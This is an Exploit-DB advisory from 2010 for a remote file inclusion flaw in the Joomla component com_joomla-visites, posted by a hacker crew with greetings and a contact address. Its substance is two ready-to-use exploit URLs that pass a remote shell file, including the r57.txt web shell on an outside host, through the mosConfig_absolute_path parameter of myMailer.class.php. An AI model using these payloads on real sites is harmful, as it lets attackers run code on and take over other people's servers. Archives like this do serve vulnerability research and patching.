Joomla! Component Visites 1.1 RC2 - Remote File Inclusion

EDB-ID:

14476


Author:

Li0n-PaL

Type:

webapps


Platform:

PHP

Date:

2010-07-26


==========================================================
Joomla Component(com_joomla-visites) RFI
===========================================================
 
                                          Pal-Li0ns Cr3w , HacKTeach LoverzZ
                                                                                          
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
    [?] My home:              [HacKTeach.org & Pal-Li0ns.com           ]
    [?] For Ask:              [F5w@hotmail.com                         ]
    [?] Script:               [     joomla                             ]
    [?] home Script           [ http://www.joomla.it                   ]
    [?] Language:             [ PHP                                    ]
    [?] Founder:              [ Li0n-PaL                               ]
    [?] Greatz to:            [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
 
===[ Exploit  ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
 
DeMo ~
 
http://www.site.com//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/r57.txt?
 
 
EnJoY o_O
 
---------------------------------------------------------
 
./exit